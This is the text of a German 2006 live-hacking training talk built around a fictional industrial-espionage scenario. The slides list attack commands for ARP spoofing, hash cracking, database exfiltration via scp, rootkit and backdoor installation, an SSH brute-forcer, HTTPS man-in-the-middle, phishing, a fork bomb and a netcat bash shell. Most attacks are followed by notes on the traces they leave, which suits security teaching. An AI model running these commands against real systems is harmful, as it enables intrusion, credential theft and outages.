14 = \ r\/\/ 8z / 3u55

Transkript

1 14 = \ r\/\/ 8z / 3u55 4R u / 9 /\/\4 / 1P _ / \/0 / )473 / 00. 4Pr1l _1\/3-4x0ring /\/\4r71 / 9. \/\/u / dr4/\/\ \/\/u / dr4/\/\@7r0 / 1(9 _ 4Rd.(0/\/\ Martin G. Wundram Zur AGENDA Seite: 1

2 IAF NRW BZ Neuss Arbeitstagung Manipulation von Daten 19. April 2006 Live Hacking Martin G. Wundram Martin G. Wundram Zur AGENDA Seite: 2

3 Agenda I.Begrüßung und Braingym II.Was macht TronicGuard? III.Fallbeschreibung: Deutsche-Top-Technologie GmbH IV.Das Netzwerk ausspähen LAN-Angriffe Internet-Angriffe 1.MITM abfangen 2.Physischer Angriff 3.MITM HTTPS-Login abfangen 4.SSHD mit Passwortlogging 5.Shell-Bombe Bonus-Angriffe 16.TinyPHPForum 17.PHPWebsite 18.MS-DNS-Redirect 6.DB-Server kompromittieren 7.Windows XP kompromittieren 8.Frame-Hijacking 9.JavaScript-Injection 10.Ebay Account phishen 11.Eine box r00ten 12.DOS-Angriff gegen SSHD 13.DOS gegen aktive Firewall 14.IDS lahmlegen 15.Versteckter Datenkanal Martin G. Wundram Zur AGENDA Seite: 3

4 Über mich Geschäftsführender Gesellschafter der TronicGuard GmbH 24 Jahre alt Vordiplom Wirtschaftsinformatik Ich freue mich auf die Begegnung mit Ihnen Und bin auch nach dem Vortrag jederzeit erreichbar. Am besten per Mail an: Martin G. Wundram Zur AGENDA Seite: 4

5 Braingym Stefan, Jan, Tim, Iris, Erika und Heide sind im Garten. Plötzlich zieht ein Gewitter auf; es grollt bedrohlich. Die Jungen rennen ins Haus. Doch keine der drei anderen folgt ihnen. Warum nicht? Martin G. Wundram Zur AGENDA Seite: 5

6 Über uns / Braingym Iris, Erika und Heide sind Pflanzen! Komplexe Themen einfach erschließen Bei Unklarheiten jederzeit nachfragen Im gemeinsamen Dialog Antworten erarbeiten Martin G. Wundram Zur AGENDA Seite: 6

7 Martin G. Wundram Zur AGENDA Seite: 7

8 Martin G. Wundram Zur AGENDA Seite: 8

9 Thinkgeek.com: Internet urinal Martin G. Wundram Zur AGENDA Seite: 9

10 Über die Präsentation Überblick: - Gewinnung von Informationen über Netzwerke - Netzwerküberwachung mit Linux - Konzeptionelle und konkrete Sicherheitslücken ausnutzen - Angreifen von innen und von aussen Die Themen können nur eine Anregung geben Thema uninteressant? Überspringen! Martin G. Wundram Zur AGENDA Seite: 10

11 Agenda III.Fallbeschreibung: Deutsche-Top-Technologie GmbH IV.Das Netzwerk ausspähen LAN-Angriffe 1.MITM abfangen 2.Physischer Angriff 3.MITM HTTPS-Login abfangen 4.SSHD mit Passwortlogging 5.Shell-Bombe Bonus-Angriffe 16.TinyPHPForum 17.PHPWebsite 18.MS-DNS-Redirect Internet-Angriffe 6.DB-Server kompromittieren 7.Windows XP kompromittieren 8.Frame-Hijacking 9.JavaScript-Injection 10.Ebay Account phishen 11.Eine box r00ten 12.DOS-Angriff gegen SSHD 13.DOS gegen aktive Firewall 14.IDS lahmlegen 15.Versteckter Datenkanal Martin G. Wundram Zur AGENDA Seite: 11

12 Was macht TronicGuard? Internet Service Provider IT-Infrastruktur: Firewalls, File-Server, Backup-Server,... Webentwicklung, Content Management Systeme Training Sachverständigentätigkeit im Bereich Unix-Systeme Support für FreeBSD und OpenBSD Martin G. Wundram Zur AGENDA Seite: 12

13 Fallbeschreibung: Deutsche-Top-Technologie GmbH Wer wir sind (Ihre fiktive Rolle im Unternehmen): Seit kurzem Projektleiter in der Kreativ-Abteilung (Aussenstelle) der DTT GmbH. Was die DTT GmbH macht: Technologieunternehmen, betreibt Grundlagenforschung im Sanitärbereich ->Fantasieunternehmen! Martin G. Wundram Zur AGENDA Seite: 13

14 Fallbeschreibung: Deutsche-Top-Technologie GmbH Was wir machen: Mit 12 Mitarbeitern neue Geschäftsideen entwickeln. Ein Administrator betreut die vorhandenen Computer. Unsere Idee: Das wertvolle Know-How der Firma stehlen und gewinnbringend an die Konkurrenz verkaufen. Martin G. Wundram Zur AGENDA Seite: 14

15 Fallbeschreibung: Deutsche-Top-Technologie GmbH Das wissen wir: Permanter Internetzugang Alles Wichtige in der Datenbank unserer Aussenstelle Der Inhalt wichtiger s wird mit einem speziellen Programm verschlüsselt, wenn wertvolle Geschäftsgeheimnisse an die Zentrale gesendet werden Unser PC startet Windows XP Helix o.ä. haben wir mitgebracht Martin G. Wundram Zur AGENDA Seite: 15

16 Das Netzwerk ausspähen??????????????? Wo sind wir? Wer sind wir? Gibt es Andere, und wer sind die? Was können wir über das Netzwerk und seine angeschlossenen Geräte erfahren? Infrastruktur! Martin G. Wundram Zur AGENDA Seite: 16

17 Das Netzwerk ausspähen z.b. von Windows XP aus: Eigene IP-Adresse, Subnetz-Maske, Standardgateway und DNS-Server notieren (cmd -> ipconfig -> nslookup) Traceroute ins Internet um weitere Gateways und Router hinter dem Default-Gateway zu finden (cmd -> tracert <host>) Einstellungen im Browser auf Proxy-Konfiguration prüfen Wichtig: Den eigenen Computer auf DHCP-Adressvergabe stellen! Martin G. Wundram Zur AGENDA Seite: 17

18 Das Netzwerk ausspähen Ist das Netzwerk geswitcht, oder wird ein Hub verwendet? -> Traffic im promiscuous-mode sniffen (tcpdump, urlsnarf, ettercap o.ä. verwenden) HUB? SWITCH? ??? MAC A Ethernet-Frame: MAC A -> MAC D MAC B MAC C MAC D Martin G. Wundram Zur AGENDA Seite: 18

19 Das Netzwerk ausspähen Computer 1 Computer 2 Ethernet-Frame: MAC A -> MAC D TCP/IP-Referenzmodell Martin G. Wundram Zur AGENDA Seite: 19

20 Das Netzwerk ausspähen Encapsulation / Kapselung Martin G. Wundram Zur AGENDA Seite: 20

21 Das Netzwerk ausspähen Promiscuous mode Netzwerkkarten können in den promiscuous mode gesetzt werden Martin G. Wundram Zur AGENDA Seite: 21

22 Das Netzwerk ausspähen UNIXoide Systeme haben eingebaute Hilfen: man <genaues suchwort> apropos <teilwort> Nutzen Sie diese!! tcpdump: Gibt die Header von Paketen eines Netzwerkinterfaces aus. Kann durch Filter konfiguriert werden. Ein Unix-Standardtool. Nutzt das Interface bpf (Berkley Packet Filter). man tcpdump. Martin G. Wundram Zur AGENDA Seite: 22

23 Das Netzwerk ausspähen SWITCH oder HUB? Martin G. Wundram Zur AGENDA Seite: 23

24 Das Netzwerk ausspähen Andere Geräte im Netzwerk finden und deren Dienste und ihr Betriebsystem prüfen: nmap -v -O nmap: Nmap network exploration tool and security scanner. man nmap Bei Systemen, die nicht erkannt werden, telnet, netcat oder nmap -v -sv <host> auf offene Ports zur Informationsgewinnung. Router? Martin G. Wundram Zur AGENDA Seite: 24

25 Das Netzwerk ausspähen WAN / Internet DSL/ISDN-Router, Gateway und Firewall, OpenBSD Switch Fileserver, SuSE Linux Unser Hacker-PC, Helix Interne Datenbank und Webserver, FreeBSD 12 Windows XP Clients (Der Administrator und die übrigen Mitarbeiter) Martin G. Wundram Zur AGENDA Seite: 25

26 Das Netzwerk ausspähen Spuren? Promiscuous-Mode kann erkannt werden (ARP-Tests) Scannen kompletter Subnets kann von NIDS (Network Intrusion Detection System, z.b. snort) bemerkt werden Vollständige Verbindungen auf offene Ports (z.b. mit netcat) hinterlassen Logfile-Einträge: May 14 15:52:37 linuxbox sshd[3820]: Did not receive identification string from Martin G. Wundram Zur AGENDA Seite: 26

27 Angriff 1: s abfangen und Verschlüsselung knacken Beschreibung Wir wissen, dass der Abteilungsleiter Herr Meier in Kürze eine Produktstudie per an die Zentrale senden wird. Daher vergiften wir seinen ARP-Cache und den des Gateways, Können voll-duplex seine Daten mithören und Die abfangen Anschließend: Verschlüsselte knacken Martin G. Wundram Zur AGENDA Seite: 27

28 Angriff 1: s abfangen und Verschlüsselung knacken Sniffing-Grundlagen Wie können Daten in einem geswitchen LAN abgehört werden? SWITCH :40:63:ca:b9:42 Sniffer 00:40:63:c1:1c:cc Switches erkennen das Ziel eines Datenpakets anhand der Ziel-MAC (Media Access Control) und stellen es nur diesem Ziel zu: Punkt-zu-Punkt-Verbindung Martin G. Wundram Zur AGENDA Seite: 28

29 Angriff 1: s abfangen und Verschlüsselung knacken Sniffing-Grundlagen arpspoof (ARP-Poisoning) Switch WAN / Internet Opfer MAC A ARP-Tabelle des Opfers: IP Gateway -> MAC C Sniffer MAC B Gateway MAC C Gezieltes Manipulieren eines einzelnen Hosts zur Überwachung Martin G. Wundram Zur AGENDA Seite: 29

30 Angriff 1: s abfangen und Verschlüsselung knacken Sniffing-Grundlagen arpspoof (ARP-Poisoning) Switch WAN / Internet Opfer MAC A ARP-Tabelle des Opfers: IP Gateway -> MAC B Sniffer MAC B Gateway MAC C Martin G. Wundram Zur AGENDA Seite: 30

31 Angriff 1: s abfangen und Verschlüsselung knacken Sniffing-Grundlagen ARP ist ein verbindungsloses Protokoll -Computer speichern gemeldete Einträge (Reply) auch ohne diese vorher angefragt zu haben (Request) -Permanente ARP-Replies an das Opfer(Antwortpake) mit Zuordnung: IP-des-Gateway <-> MAC-des-Sniffers Konsequenz: Daten werden vom Opfer nicht mehr an das Gateway, sondern an den Sniffer gesendet Manipulation lediglich auf Ethernet-Ebene! Martin G. Wundram Zur AGENDA Seite: 31

32 Angriff 1: s abfangen und Verschlüsselung knacken Die abfangen (Von: Helix) IP-Forwarding aktivieren echo 1 > /proc/sys/net/ipv4/ip_forward Herrn Meier's PC vergiften arpspoof -t IP_OPFER IP_GATEWAY Das Gateway vergiften arpspoof -t IP_GATEWAY IP_OPFER Herrn Meier's s abfangen tethereal -V "host IP_OPFER && port 25" tee sniffed.messages Martin G. Wundram Zur AGENDA Seite: 32

33 Angriff 1: s abfangen und Verschlüsselung knacken Die auswerten (Von: Helix oder Windows) Der Inhalt der Mail liegt im Rohformat in sniffed.messages vor Die Mail ist, wie erwartet, verschlüsselt Herr Meier schreibt keine Großbuchstaben und endet alle seine s wie folgt: herr meier deutsche-top-technologie gmbh Knacken Sie die Mail! Martin G. Wundram Zur AGENDA Seite: 33

34 Angriff 1: s abfangen und Verschlüsselung knacken Spuren? Die ARP-Tabelle der vergifteten Hosts ändert sich temporär ARP-Spoofing kann von einem NIDS zum Beispiel mit dem Tool arpwatch erkannt und gemeldet werden Martin G. Wundram Zur AGENDA Seite: 34

35 Angriff 2: DB-Server kompromittieren und DB kopieren Beschreibung Der Datenbankserver der Aussenstelle ist von besonderem Interesse, da in der Datenbank das Know-How der Firma gespeichert ist. Unser Ziel: In den DB-Server eindringen und die DB kopieren. Was wir wissen: Auf dem Datenbankserver läuft ein Webserver. Als Datenbanksystem wird MySQL verwendet. Martin G. Wundram Zur AGENDA Seite: 35

36 Angriff 2: DB-Server kompromittieren und DB kopieren Martin G. Wundram Zur AGENDA Seite: 36

37 Angriff 2: DB-Server kompromittieren und DB kopieren Das Web-Frontend untersuchen Das Frontend wurde in PHP programmiert phpinfo.php liefert hier Informationen über den Webserver und die PHP-Umgebung ( phpinfo() ) Einzelne Unterpunkte werden als PHP-Datei mit der Endung.inc im Unterordner inc eingebunden Übergabe der gewünschten Datei per GET in include Beliebige andere Übergaben möglich: Martin G. Wundram Zur AGENDA Seite: 37

38 Angriff 2: DB-Server kompromittieren und DB kopieren Das Web-Frontend untersuchen at:!:12551:0:99999:7::: bin:*:8902:0:10000:::: daemon:*:8902:0:10000:::: ftp:*:8902:0:10000:::: games:*:8902:0:10000:::: lp:*:8902:0:10000:::: mail:*:8902:0:10000:::: man:*:8902:0:10000:::: mysql:!:12551:0:99999:7::: news:*:8902:0:10000:::: nobody:*:8902:0:10000:::: ntp:!:12551:0:99999:7::: postfix:!:12551:0:99999:7::: root:fg4re/3vax6aw:12551:0:10000:::: sshd:!:12551:0:99999:7::: uucp:*:8902:0:10000:::: wwwrun:*:8902:0:10000:::: achim:3bxoqijnpf3he:12551:0:99999:7:-1:: difficult:tgf0ouuomo3e6:12552:0:99999:7:-1:: elite:0ep61aoxfplr6:12552:0:99999:7:-1:: hacker:fzchoc7bouzns:12552:0:99999:7:-1:: quark:iwk7ky7u7akp2:12552:0:99999:7:-1:: Der Webserver läuft hier als User root und kann daher jede System- Datei öffnen! Martin G. Wundram Zur AGENDA Seite: 38

39 Angriff 2: DB-Server kompromittieren und DB kopieren Die Passwort-Hashes knacken Passwörter in Linux in der Vergangenheit per default mit 40Bit DES gehasht: root:fg4re/3vax6aw Die Passwörter mit john ermitteln John läuft unter Linux/Unix und Win32 Wörterbuch-Attacken mit Permutationen Brute-Force-Attacken (alle Kombinationen ausprobieren) Martin G. Wundram Zur AGENDA Seite: 39

40 Angriff 2: DB-Server kompromittieren und DB kopieren Die Passwort-Hashes knacken Sehr schnelle Wörterbuch- und Brute-Force-Attacken: DES: ~ Passwörter/Sekunde FreeBSD MD5: ~4300 P/s OpenBSD Blowfish: ~256 P/s NT LM DES: ~ P/s (1,7GHz-System, Intel Pentium-M) Hier: Worst-Case-Laufzeiten für DES: a-z, 4 Zeichen: 2,8s a-za-z0-9, 4 Zeichen: 92s a-za-z0-9, 6 Zeichen: 99h a-za-z0-9, 8 Zeichen: 43y Martin G. Wundram Zur AGENDA Seite: 40

41 Angriff 2: DB-Server kompromittieren und DB kopieren Einloggen und die Datenbank kopieren Als Root per SSH einloggen (z.b. mit putty von Windows aus) Die Datenbank in /var/lib/mysql mit tar/gzip komprimieren: tar -czf /var/datenbank.tgz /var/lib/mysql Abschließend die Datenbank kopieren (z.b. mit scp von Linux aus): scp /zielordner_auf_meinem_pc Martin G. Wundram Zur AGENDA Seite: 41

42 Angriff 2: DB-Server kompromittieren und DB kopieren Backdoor installieren Die DB soll regelmäßig kopiert werden, aber: Die Passwörter könnten sich ändern Eventuell wird der Webserver irgendwann sicher konfiguriert Daher: Backdoor installieren! Versteckter Remote-Zugriff als Root ohne Passwort Proofs of Concept: Martin G. Wundram Zur AGENDA Seite: 42

43 Angriff 2: DB-Server kompromittieren und DB kopieren Spuren? Beispiel (Debian Hack 2003): access_log speichert alle Zugriffe auf den Webserver: less /var/log/httpd-access.log utmp und wtmp speichern alle Logins: last und man wtmp SSH-Logins in /var/log/auth.log Die History-Funktion der Shell (bash) speichert die eingegebenen Befehle: history Martin G. Wundram Zur AGENDA Seite: 43

44 Angriff 2: DB-Server kompromittieren und DB kopieren Spuren? Die (hier sehr simple) Backdoor erscheint in der Prozess-Liste: ps aux Eintrag für den Start der Backdoor in Startup-Skripten Die atime (Zugriffs-Zeitstempel) wird für alle geöffneten Dateien/Ordner aktualisiert Martin G. Wundram Zur AGENDA Seite: 44

45 Angriff 3: Lokalen Zugriff ausnutzen und Root werden Beschreibung Es bietet sich die Gelegenheit, ungestört direkt an das OpenBSD-Gateway und an den Linux-Fileserver heranzutreten. Harter Reboot, um danach das Root-Passwort neu zu setzen Martin G. Wundram Zur AGENDA Seite: 45

46 Angriff 3: Lokalen Zugriff ausnutzen und Root werden OpenBSD-Gateway lokal Per Reset harten Neustart durchführen Am Boot-Prompt mit der Option boot -s Single-User-Mode starten Mit grep ^root /etc/master.passwd den alten Hash anzeigen und eventuell sichern Die /-Partition mit Schreibrechten re-mounten: mount -o rw / Mit passwd eine neues Passwort vergeben (z.b ) Neustarten Martin G. Wundram Zur AGENDA Seite: 46

47 Angriff 3: Lokalen Zugriff ausnutzen und Root werden Windows XP lokal Per Reset harten Neustart durchführen Mit Linux-LiveCD von CD starten Passwort-Rücksetzer aktivieren Das Admin-Passwort blanken Zugriff jetzt ohne Passwort möglich Alternativ: Bisheriges Passwort durch Neues überschreiben Martin G. Wundram Zur AGENDA Seite: 47

48 Angriff 3: Lokalen Zugriff ausnutzen und Root werden Spuren? Der Neustart wird ebenfalls in wtmp gespeichert: last uptime Das Dateisystem muss geprüft werden (fsck) Unter Umständen zeitintensiv Im schlimmsten Fall: Partition korrupt Zeitstempel und Signatur (MD5) der Passwortdatei ändern sich Martin G. Wundram Zur AGENDA Seite: 48

49 Angriff 4: Kompromittierung eines Windows XP-Systems Beschreibung Wir übernehmen hier die Rolle des ungeliebten Controllers, der ständig die Löhne senken will. Wir haben dass Gefühl, nicht besonders beliebt zu sein... Wir sitzen vor unserem PC mit Windows XP und ein Kollege schickt per Mail einen Link auf die Seite: Da wir auf Sicherheit achten, benutzen wir den Browser Firefox Martin G. Wundram Zur AGENDA Seite: 49

50 Angriff 4: Kompromittierung eines Windows XP-Systems Die Javaskript-Schwachstelle Durch eine Lücke im Firefox können wir per Javaskript eine Batchdatei auf dem Opfer-System anlegen und diese mit den Rechten des angemeldeten Benutzers ausführen. Das Batchfile lädt per FTP eine bösartige Programmdatei und belastendes Bildmaterial herunter und führt die Programmdatei dann aus. Danach werden bis auf die Bilder alle Spuren entfernt. Zusätzlich wird die Hosts-Datei manipuliert Martin G. Wundram Zur AGENDA Seite: 50

51 Angriff 4: Kompromittierung eines Windows XP-Systems Spuren? Der Browser cached die aufgerufene Seite Die DOS-Box ist kurze Zeit zu sehen Die gelöschten Dateien werden nicht überschrieben und könnten daher wiederhergestellt werden Der FTP-Download könnte vom Gateway protokolliert werden Eine lokale Firewall könnte den Vorgang erkennen und sogar unterbinden Die Manipulation der Hosts-Datei ist natürlich leicht zu erkennen Martin G. Wundram Zur AGENDA Seite: 51

52 Angriff 5: Frame-Hijacking Beschreibung Die DTT GmbH wickelt ihr Banking online bei der Sparkasse XY ab (PIN/TAN). Jeden Tag um 10:00 Uhr fragt Herr Meier den Kontostand ab und überweist fällige Rechnungen. Um diese Zeit schicken wir Ihm eine präparierte Mail mit einem verlockenden Link. Mit etwas Glück kann der Content-Frame gegen einen eigenen getauscht werden. Auch bei SSL-Verbindung ohne Warnung. (Betrifft u.a. Internet Explorer und Mozilla bis 1.7.2) Martin G. Wundram Zur AGENDA Seite: 52

53 Angriff 5: Frame-Hijacking Mozilla installieren! Martin G. Wundram Zur AGENDA Seite: 53

54 Angriff 5: Frame-Hijacking Spuren? Es wird eine weitere Website nachgeladen. Diese hinterlässt wie üblich Spuren im Verlauf, Cache, Proxy- Log, Proxy-Cache,... Martin G. Wundram Zur AGENDA Seite: 54

55 Angriff 6: JavaScript-Injection Beschreibung JavaScript-Injection: In Anlehnung an Angriff 2 wollen wir hier einer anfälligen Webseite bösartigen JavaScript-Code übergeben. Der Browser des Opfers führt diesen Code dann in der Sicherheitszone der betreffenden Website aus. Martin G. Wundram Zur AGENDA Seite: 55

56 Angriff 6: JavaScript-Injection Spuren? Log-entry im Webserver: [09/Sep/2004:20:22: ] "GET /inject/index.php?eingabe=%68%61%6c%6c%6f HTTP/1.1" [...] Wie üblich Spuren im Verlauf, Cache, Proxy-Log, Proxy-Cache,... Martin G. Wundram Zur AGENDA Seite: 56

57 Angriff 7: HTTPS-Login Man-in-the-Middle abfangen Beschreibung Der durch die verdächtigen Aktivitäten der letzten Zeit verunsicherte Systemadministrator verwendet seinen Webmailer mittlerweile nur noch per SSL-geschützter Verbindung. Das Ziel ist, trotz SSL-Verbindung Benutzername und Kennwort des Administrators herauszufinden. ->dnsspoof, webmitm Martin G. Wundram Zur AGENDA Seite: 57

58 Angriff 7: HTTPS-Login Man-in-the-Middle abfangen SSL-Zertifikat Zertifikat ausgestellt für FQDN! Martin G. Wundram Zur AGENDA Seite: 58

59 Angriff 7: HTTPS-Login Man-in-the-Middle abfangen dnsspoof Access-Router WAN / Internet Firewall, DNS-Server 3. DNS-Reply: Opfer 1. Browser: 2. DNS-Query: 4. Browser baut Verbindung auf zu: und zeigt an: Martin G. Wundram Zur AGENDA Seite: 59

60 Angriff 7: HTTPS-Login Man-in-the-Middle abfangen dnsspoof Access-Router WAN / Internet Firewall, DNS-Server 4. DNS-Reply: Opfer 1. Browser: 2. DNS-Query: 5. Browser baut Verbindung auf zu: und zeigt an: Hacker / MITM 3. Spoofed DNS-Reply: Hacker baut eigene SSL-Verbindung auf zu: Transparenter HTTP-Proxy zeigt Opferdaten im Klartext an Martin G. Wundram Zur AGENDA Seite: 60

61 Angriff 7: HTTPS-Login Man-in-the-Middle abfangen Hintergrund Auflösung von FQDN --> IP ist Schwachstelle. Durch Manipulation dieser Zuordnung Umbiegen möglich. Zertifikate normalerweise für FQDN's ausgestellt. Manipulation auch z.b. durch geändertes hosts-file möglich. Keine Warnung, wenn das eigene Zertifikat vom Browser als gültig erkannt wird (z.b. Thawte, Verisign,...). Achtung bei Aufruf über IP: Martin G. Wundram Zur AGENDA Seite: 61

62 Angriff 7: HTTPS-Login Man-in-the-Middle abfangen IP-Forwarding echo 1 > /proc/sys/net/ipv4/ip_forward Arpspoof Opfer arpspoof -t Arpspoof Gateway arpspoof -t Datei anlegen host mit eintrag IP-HACKER dnsspoof ( man dnsspoof ) webmitm -dd Zertifikat erstellen (Den Anweisungen folgen) Martin G. Wundram Zur AGENDA Seite: 62

63 Angriff 7: HTTPS-Login Man-in-the-Middle abfangen Spuren? Auf dem Client-PC: Unter Umständen keinerlei Spuren. Manipulation direkt im DNS-Server möglich. Evtl. (zwischen)gespeichertes Zertifikat. Auf dem eigentlichen Server: Die IP/Hostname des MITM- Systems statt des Opfer-Hosts. Martin G. Wundram Zur AGENDA Seite: 63

64 Angriff 8: Ebay Account phishen Beschreibung Jetzt wollen wir den privaten Ebay Account des Systemadministrators hacken. Eine vermeintliche E-Bay-Mail, die offensichtlich auf ebay.de verlinkt, in Wirklichkeit aber auf ein gefälschtes Login-Formular auf unserem eigenen Server verweist, wird hier wohl ausreichen... May/ html Martin G. Wundram Zur AGENDA Seite: 64

65 Angriff 9: Webserver hacken und Rootkit installieren Beschreibung Da die Software des Fileservers veraltet ist (SuSE Linux 8.0) haben wir es hier mit einem potentiell einfachen Ziel zu tun. Um an die Daten zu kommen, müssen wir Zugriff auf den Root- Account bekommen. Ein Rootkit sorgt dafür, dass wir auch in Zukunft bequemen Zugriff auf das System haben. Martin G. Wundram Zur AGENDA Seite: 65

66 Angriff 9: Webserver hacken und Rootkit installieren Systemzugriff erlangen Oft werden sehr schlechte Benutzername/Kennwort- Kombinationen wie admin/admin oder admin/1234 vergeben. SSH-Verbindung auf datenbank: ssh Kennwort h4cker und dann./ssh-brute passwords Oder wenn expect auf eigenem System installiert: ftp und ssh-brute und passwords downloaden Martin G. Wundram Zur AGENDA Seite: 66

67 Angriff 9: Webserver hacken und Rootkit installieren Userrechte erhöhen Uname -a -> Kernel Für so einen alten Kernel gibt es etliche local root exploits z.b. oder FTP-Download von Exploit auf dem Opfer-System kompilieren: gcc -o elflbl elflbl.c Exploit ausführen: chmod 755 elflbl; elflbl Martin G. Wundram Zur AGENDA Seite: 67

68 Angriff 9: Webserver hacken und Rootkit installieren Rootkit installieren Damit wir auch in Zukunft Root-Zugriff haben, ohne erneut in das System einbrechen zu müssen, installieren wir jetzt ein Rootkit. Vom Opfer-System FTP auf und Download von dk.tar.gz und inst -> Mit dk.tar.gz testen wir ob bereits ein SucKIT installiert ist -> Mit inst installieren wir ein eigenes SucKIT Martin G. Wundram Zur AGENDA Seite: 68

69 Angriff 9: Webserver hacken und Rootkit installieren Spuren? Datenauswertung des Systems machen! Martin G. Wundram Zur AGENDA Seite: 69

70 Angriff 10: DOS-Angriff gegen den sshd des Webservers Beschreibung Um zu verhindern, dass sich der Administrator während des Angriffs per SSH mit dem Server verbindet, zehren wir einfach alle Slots durch einen simplen DOS auf: 10x: ssh Jetzt nochmal: ssh Auszug aus /etc/ssh/sshd_config: MaxStartups 10 Martin G. Wundram Zur AGENDA Seite: 70

71 Angriff 10: DOS-Angriff gegen den sshd des Webservers Spuren? Reguläre Einträge für ssh-verbindungsversuche die durch einen timeout beendet wurden (LoginGraceTime {z.b. 120} beachten) Martin G. Wundram Zur AGENDA Seite: 71

72 Angriff 11: SSHD mit Passwortlogging Beschreibung: Erweiterte Systemprotokollierung Ein befreundeter Administrator bittet uns, während seines Urlaubs auf den zentralen Uni-Server aufzupassen. Wir nutzen die Gelegenheit um an ein paar Passwörter zu kommen. ssh Kennwort: mwadmin / root-kennwort: Jetzt auf Benutzerverbindungen warten: ssh user_xyq@ Sniff-Datei: /root/passwoerter Martin G. Wundram Zur AGENDA Seite: 72

73 Angriff 12: Shell-Bombe Beschreibung Stillstand auf einem Unix-System erzeugen: ssh ulimit :(){ : :& };: Martin G. Wundram Zur AGENDA Seite: 73

74 Angriff 13: DOS gegen aktive Firewall Beschreibung Manche Firewalls ergreifen aktiv Gegenmaßnahmen bei (vermeintlichen) Angriffen Proof of Concept: block in quick on $interface from <sshblock> to any pass in quick on $interface proto tcp from any port > 1023 to $interface2 \ port 22 keep state \ (max-src-conn 10, max-src-conn-rate 5/15, overload <sshblock> flush) Test mit lokaler Firewall Martin G. Wundram Zur AGENDA Seite: 74

75 Angriff 14: IDS lahmlegen Beschreibung (N)IDS (Network) Intrusion Detection Systems versuchen sicherheitsrelevante Vorfälle zu erkennen und u.u. sogar Gegenmaßnahmen durchzuführen Sensoren versorgen diese Systeme mit den nötigen Daten/Datenpaketen Um ungestört und unerkannt im Netz der DTT zu arbeiten, werden wir die Sensoren jetzt ausschalten Martin G. Wundram Zur AGENDA Seite: 75

76 Angriff 14: IDS lahmlegen Proof of Concept tcpdump als Sensor downloaden Kompilieren: gcc -o xtcpdump-bgp-dos xtcpdump-bgp-dos.c Ausführen:./xtcpdump-bgp-dos Lists/securityfocus/bugtraq/ /0448.html Martin G. Wundram Zur AGENDA Seite: 76

77 Angriff 15: Versteckter Datenkanal Beschreibung Der Administrator der DTT hat wegen der vielen Sicherheitsvorfälle in der letzten Zeit direkten Zugriff ins Internet gesperrt. Connectivity jetzt nur noch durch einen HTTP-Proxy Wie können wir doch noch unsere eigenen Netzwerkprotokolle und unsere eigenen Server erreichen?? Martin G. Wundram Zur AGENDA Seite: 77

78 Angriff 15: Versteckter Datenkanal httptunnel Bidirektionale, getunnelte Verbindung in HTTP-Requests Der Client übermittelt einen POST und erhält darauf eine Antwort. An den jeweiligen Strom werden nachfolgende Daten angehängt. Martin G. Wundram Zur AGENDA Seite: 78

79 Angriff 15: Versteckter Datenkanal Martin G. Wundram Zur AGENDA Seite: 79

80 Angriff 15: Versteckter Datenkanal Martin G. Wundram Zur AGENDA Seite: 80

81 Angriff 15: Versteckter Datenkanal Httptunnel verwenden Telnet-Server bauen (telnetd nicht in Knoppix-STD enthalten): nc -l -e /bin/bash -p 9100 httptunnel-serverkomponente starten: hts -F localhost: httptunnel-clientkomponente starten: htc -F 23 localhost:80 Ethereal starten: ethereal (Interface lo, nach dem capture: Display-Filter http) Telnet-Verbindung starten : nc localhost 23 Martin G. Wundram Zur AGENDA Seite: 81

82 Angriff 16: TinyPHPForum Beschreibung Googlen: powered tinyphpforum Beispiel1: Beispiel2: Martin G. Wundram Zur AGENDA Seite: 82

83 Angriff 17: PHPWebsite Beschreibung Martin G. Wundram Zur AGENDA Seite: 83

84 Angriff 17: PHPWebsite Beschreibung Martin G. Wundram Zur AGENDA Seite: 84

85 Angriff 17: PHPWebsite Beschreibung Martin G. Wundram Zur AGENDA Seite: 85

86 G e s c h a f f t! V i e l e n D a n k u n d b i s b a l d! Martin G. Wundram Zur AGENDA Seite: 86